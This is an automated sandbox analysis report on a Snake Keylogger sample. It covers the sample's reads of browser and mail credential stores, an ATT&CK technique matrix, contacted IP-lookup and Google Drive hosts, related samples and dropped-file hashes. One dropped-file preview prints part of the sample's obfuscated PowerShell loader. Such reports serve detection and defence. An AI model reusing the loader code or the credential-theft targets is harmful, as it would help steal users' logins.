Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5400, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ln5S7fIBkY.exe	68%	Virustotal		Browse
ln5S7fIBkY.exe	62%	ReversingLabs	Win32.Spyware.Snakekeylogger
ln5S7fIBkY.exe	100%	Avira	TR/Injector.ekjwr

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe	100%	Avira	TR/Injector.ekjwr
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe	62%	ReversingLabs	Win32.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe	68%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.16.206	true	false	high
drive.usercontent.google.com	142.250.181.225	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/3	msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000246C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.000000002469E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024774000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	ln5S7fIBkY.exe, 00000000.00000000.1510063030.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ln5S7fIBkY.exe, 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.181.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.16.206	drive.google.com	United States	15169	GOOGLEUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587628
Start date and time:	2025-01-10 15:59:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ln5S7fIBkY.exe renamed because original name is a hash value
Original Sample Name:	4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/12@4/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 142 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3348 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:01:01	API Interceptor	35x Sleep call for process: powershell.exe modified
10:02:45	API Interceptor	176x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
193.122.6.168	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
reallyfreegeoip.org	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.80.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
CLOUDFLARENETUS	https://booking.extrantelabelason.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.86.42
	Setup.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://eu.boxif.xyz	Get hash	malicious	Unknown	Browse	1.1.1.1
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	9pIm5d0rsW.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
37f463bf4616ecd445d4a1937da06e19	SvmL9tW29w.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	Osb7hkGfAb.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	fTSt7dc60O.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	vq6jxdGvD6.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	Ub46mg9pn4.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	fTSt7dc60O.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	nRNzqQOQwk.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	You7ynHizy.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	Xjz8dblHDe.exe	Get hash	malicious	GuLoader	Browse	172.217.16.206 142.250.181.225
	zrNcqxZRSM.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	172.217.16.206 142.250.181.225

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gy1kyeh5.sxu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxfpecd1.v4r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n312bjz4.vwm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc4pqyb5.vjg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Bevidstgjorde.ren

Download File

Process:	C:\Users\user\Desktop\ln5S7fIBkY.exe
File Type:	data
Category:	dropped
Size (bytes):	478461
Entropy (8bit):	1.2475162534380173
Encrypted:	false
SSDEEP:	1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
MD5:	BF4A008DC0B6586BA5DC8205FFC7DF72
SHA1:	0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
SHA-256:	497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
SHA-512:	71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
Malicious:	false
Preview:	.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................\|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon

Download File

Process:	C:\Users\user\Desktop\ln5S7fIBkY.exe
File Type:	ASCII text, with very long lines (3095), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	55350
Entropy (8bit):	5.34032857083146
Encrypted:	false
SSDEEP:	768:13Zs6XOqDlTXziiIlncM1oM1XgGZstyjmPcWCqqGKmafPMrV4yIAXBMWWYUGrY1b:1K69DF+lcM1tZaGK/QNAxIQsb
MD5:	A455A44AA414354FE74EE543BBF64451
SHA1:	4D73664950E0B77B2F05EEBCE4E5C3D549CC18EA
SHA-256:	C7DAC58DCAD45ABF34BEE7C7567A746FADA583C0E734D204ED2F71617C4B7B31
SHA-512:	A9BEDCAA864985C0EC2F9EB521983D23F7B58689922F39305D17FA39AA41EF02BE8BEC3FC99D22CABA1C34C56D6D68160F9DEA27BC207EDA83F97CC47F852FA7
Malicious:	true
Preview:	$Spaantag=$Circularization;..<#stemmeridse Strafvrdighed Scotty Lunchers Dysgenics Unselling #>..<#Unrelaxing Stabels Pyoses Newmarket Benzofuryl Amorosity #>..<#Annotators Enekamret Reafflict #>..<#Rejselotteri prinse Diatomaceae #>..<#Skolerne Carphosiderite Tordentalers Kargoens Fierasferoid #>..<#Eurovisionerne Nondynastic Entices Bethumb Antrffendes #>...$Schizophytic = @'.Terga.E erg$ UvitCPeripo LseptDagcetOb.kuiVelbeeProjer.irlai DehysAnl.sm,emin=herd,$ FunkPTwittaVgterrTykn aAlboct Re.eaTar.ngTrickmKagleeGreen;invio.Pibenfforryuja.kwnSor ecBestitDystriSigjnoGulddnAblaz Re.reROut.ee taraRefrecBayercImi euG otts Sh teUnscodFasts Unent(Nim i$SkitsURuffinhemiom ypisuBushwsStruniInjurcLand aInsurlCaj,liKolletT,ymayKrubu,Magne$B.dduRBeteleHeliocB visa RaadnAnsv d Culmi TeledOu,draScripc egnbyForbi)Gravs Past.{Re nd. Ungd.Nonco$bristc KarboSovehsYeasktZoehooResouvf rtrePara,rAntimtHalere refibIn virObseraEffekl abor Troch(DrueaABustls Repsd Begra Rugel Inde Korne'BarfoVtje,ea ogboa

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Unremorsefulness.Ska

Download File

Process:	C:\Users\user\Desktop\ln5S7fIBkY.exe
File Type:	data
Category:	dropped
Size (bytes):	329711
Entropy (8bit):	7.6398387580353155
Encrypted:	false
SSDEEP:	6144:Wnb/WRn8NZYlezToyw7s8kuNqZKZdsLCsdDfIS38:WTWRn0Boywg8rZdsWYDAS38
MD5:	54DAA56B551E061FB6F1295EF32A374E
SHA1:	250F5859827F66CD522D04CDFFA3829DBD933425
SHA-256:	9AD1E96273ABFEE679B731DB48243A170704A4934C5D3F17D4C2D3C796AF61C1
SHA-512:	0A5741E91597AF9F88364DB27494B44A087C3527EE9B643D5FE3B3F23687E3580C8D847A5E53D99933C06BFDFD3A665E3334FAB8A93E00D6B7EDFB28E717E6C1
Malicious:	false
Preview:	....3.KK.....l..q.................RR.........RRR......................>.................&..ll........x...;;;;....rr.......d.........XXX.ss.....TTTT...........\\................?.....................@....................................................m.....p.x............t.....-.8.....................................d.\|\|\|......;..c.......f...............}}...77..............Z.y....................u.".222.......~~........<...a............d.V./..JJ..................w......5................y.>>........X..)).............II.....444.....X......;........g.......SSSSSSSS.........uu.....'............_..........RR.dddd...-..........JJJ..............}.............................w............PP......UUUUUU....o.Y......".....f.....888.`..............--...........c...............BBB.......................}.....$........."""..................,,..oo..z...............llllll.......i.+..@@.............YYY.......................lll........(............aaa.<<<......QQ..{{{....AA.......................G.

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Yellowfin.pre

Download File

Process:	C:\Users\user\Desktop\ln5S7fIBkY.exe
File Type:	data
Category:	dropped
Size (bytes):	436009
Entropy (8bit):	1.2582605930205382
